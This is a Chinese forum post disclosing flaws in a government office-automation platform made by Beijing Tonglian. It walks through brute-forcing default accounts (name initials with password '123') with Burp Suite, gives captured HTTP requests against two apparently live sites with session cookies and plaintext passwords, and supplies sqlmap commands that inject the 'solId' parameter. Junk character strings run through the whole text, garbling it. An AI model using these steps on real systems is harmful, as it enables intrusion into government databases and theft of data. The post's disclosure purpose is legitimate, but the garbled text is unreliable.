|
, O6 B+ E' i N5 Q4 j" K
5 L8 D7 ?1 g$ ?( C: u0 B% ?0 W1 Y
" |' E) F" X8 l( x; S0 J$ u
/ `5 h3 I3 _# o! G. ?
平台简介:5 U4 x9 u0 m7 C0 z6 u0 A
) S2 v3 m6 S4 d# E- J
+ z, w( c, h% A
" s4 Q$ Y+ b5 o6 }% J; Q% P+ K
/ A) H3 A1 h' e+ n6 ^2 r1 S8 Y. Y, p
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
# Y; q r7 W- z同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
9 z7 Q* b' A7 j l( l
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!+ g. }8 C% E+ i; O5 Y6 `
# k. S U+ N! D) x
Y5 I" ], |5 w0 Z
+ n" F% x+ Q! I" n2 n8 z
+ `* I! E! R2 |! Y' v) H/ F3 h, @( w
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:4 ^! D2 Y: e) }0 m. x9 v. p
8 k8 `+ g8 S" R, h9 T' ^3 a, y% y
* u2 [+ p/ _7 L" a
: O/ L4 K4 k+ f2 g7 N1 Y! A' N
' s# J9 R2 T! J2 C; \
, m' B& A, O3 o% o http://1.1.1.1:7197/cap-aco/#(案例2-)
3 ^% e: f! e- i! ?' E4 g! T
8 O- C6 q b! X( [, s
; e) I/ a4 B" e6 [- x* @' a http://www.XXOO.com (案例1-官网网站)
8 y% J4 N# l$ O% P/ E+ Z # X$ z, M. l/ Z; ?
2 m$ k" }& V2 G5 d3 D b Q 3 l) Z- ~7 t8 f6 k7 m$ ~ {
7 I0 ?1 }9 b0 d: l4 b a( t1 [% u: p4 A2 ~
漏洞详情:# l8 z7 s: I4 L) ~' m, S( M4 ~; x" D* ]
R! T% I& t7 M0 S2 K# ?: x7 p
" P- o6 g5 H' {* y7 x 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试5 [! A: w% F0 e: u$ a
' s4 C+ m7 v$ d
1 P! B, N) ^- v' k5 A; J6 `
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
2 e4 A- k: k, f" O8 s ( g7 |9 F0 @0 ?6 z4 K; A! E+ y5 n
* x3 W7 W l# o) I' b% i% X ^, T
3 H; ?* ]6 ^3 k
* O5 U \: m# e3 q/ M' P7 Q. r& F) H6 G& ?! ?. J
5 n% y3 J. a8 K0 E
7 W" o# l- O2 K# M1 ?
! x S8 I! s$ n3 B9 W7 @: C1 g status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:) O' ?: U# j4 F/ W
2 {3 H, i7 A/ } r T
- k( m/ L. J0 q, @, Y d; V) i' H 1、案例1-官方网站6 x0 w2 R. a+ d
: O# i x. C G2 p
1 l! x8 q9 h0 R) \% z
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.17 O7 m% _" J% d1 S) G
" o- Z+ z1 B2 o0 A! v, k' G! E
9 T7 |5 \5 s/ q: ^! y3 z Host: www.XXOO.com
+ z8 y( ~% \. ^ Y# w* D4 m w& e5 D9 r: F2 A+ ?1 s& q
; E- o; Q2 S) R6 B7 v
Proxy-Connection: Keep-Alive5 [$ J/ e! V' C3 a& m$ `" }$ r
4 |1 ?/ R2 Y$ P" r' o4 K: M; r! k( c' U! n5 I1 H
Accept: application/json, text/javascript, */*; q=0.01' z+ b: ]0 a7 `- c8 P0 f
* A0 C+ M% p, C8 @! _" p9 a2 @% ]4 S5 q+ Q9 R% T
Accept-Language: zh-CN
/ {1 I! {8 t- q. V9 ] * a( ?. J9 f6 q4 A+ `
$ }. i- P( v9 w# i7 ~. d
Content-Type: application/json2 r) a8 J2 J- k6 M; {
) E5 l# c- L% |5 r1 f, h
! l, D8 K8 M1 B( ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
8 v: J: O3 X4 k: O
q% v: u& e9 G- m) s% ]8 X' ]. ]. q+ h- I
X-Requested-With: XMLHttpRequest
0 C3 L9 s+ v3 D* \7 Z0 Z2 C1 ]# y ~: T $ k! a. N2 I* [) o. P% M% t
! c8 }' N1 L9 @4 @4 G& u Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002/ ]& e0 K& g2 V g# ?
6 I. T$ | @& |* b9 w, v
- Z( U! G" e# \; d& u Accept-Encoding: gzip, deflate, sdch5 W1 }: n- U0 e2 i) i7 q7 D
- ^$ e0 P `) [& a# i0 |* l
3 P5 P# l' Z4 o
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
! x3 f: I( ]6 [, ]1 Q1 C! Z
7 m4 m; L' x) M9 V! J+ }8 B( H, S( c$ _
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
3 A8 z# ^) G5 E% c
9 r0 T5 b$ g0 v6 d
8 H R# R1 Y3 }# u1 r; P 
8 r. ]7 p( g) m) _ 1 X R# l6 n } {
+ y/ ?% x- ?5 Z: z* n9 O 
4 K5 C4 c1 e% R( C; @! A 5 T' W6 k& J" k
* `; n, c9 g2 o) S5 c9 m
/ \$ n; s) C. [: L6 A5 Y# o3 l
* ^; U& r0 ^7 x; t- l. V
0 ]: J# ?$ c" i3 }. B! ~* X h* C
4 G4 z/ @- L+ c( I$ Q3 j. T% ^
& k$ s7 \4 [- P" C8 k; M% J4 V# e' h3 L
) }/ Y# g% Y+ T9 p% i! E- G
" a! m2 I" b1 ^3 d: e! \* q3 J
7 @: g3 ~$ P; U6 d- j: d" P3 Y' z 2、案例2-某天河云平台) {9 }& ~7 l. c
8 W1 ~! L4 @9 J( e/ P) u L# j0 d8 J! ^) L! w* t* _) @
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.10 f: q! v. q* G- H7 N% {5 a
, c) V0 T& ~6 ^# R0 P
% m3 Z! }3 a# m7 X% x Host: 1.1.1.:7197, [# l' q: L/ w, g1 E
0 M4 H- m* m6 D8 v# d- ~6 B2 ~' }7 @/ @8 |& E
Accept: application/json, text/javascript, */*; q=0.01+ n* O3 b8 o! M4 D' g* h
; Z; ?# U1 w% B' B% R: z
6 V0 U5 _+ a4 s: g+ z5 p4 v$ ^ X-Requested-With: XMLHttpRequest" |2 x' X6 K, _8 ~4 k) H8 g6 q/ B
6 J- |4 X1 \* a3 k# v# n- B# f
) @* r3 T2 p" {' k/ K) l) @. J
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.08 c$ a; M, [) f) Y
; N5 o, r& s, s6 L7 s7 P% B/ [
2 r$ R5 X9 X L3 s! B3 Y Content-Type: application/json! W( [0 ^, j5 ?4 s, U A: H
# o; h3 e) R0 h
9 k5 t) o; J7 G0 @& e& U
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
6 {6 W3 `7 V) ?
. f" l! [3 d, P7 d
/ \; m m$ Y8 C& [+ ?. O8 V7 A7 X8 b Accept-Language: zh-CN,zh;q=0.8/ C) ~7 _3 ?. x- `
. s0 h3 l& L) _/ v0 E
' J/ y8 f2 f3 |0 [6 }
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
7 N6 a- \& v) M' t G) Z ( b/ u8 A7 L8 i
$ n. ~) G2 S& X* ?, U9 W- w! { Connection: close4 W+ ]% d% |# N5 ^ v
6 k0 C; L. J c. C
0 I6 f- a9 \4 D# q8 ? 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:1 _) e6 O2 a" N- b6 ~$ {4 V
! }9 c- o, O0 I9 z& T+ H
/ l e0 V8 ~" f8 ~ 
; @* \, K, ^3 k7 ~+ \8 w1 Y0 W 4 w1 `6 _, S: x0 F
2 C5 {, L$ g1 Q* g8 A+ G& u) g
6 b: n' J' |, ?$ X* y* v" K | 
发表于 2018-10-20 20:15:17
收藏
支持
反对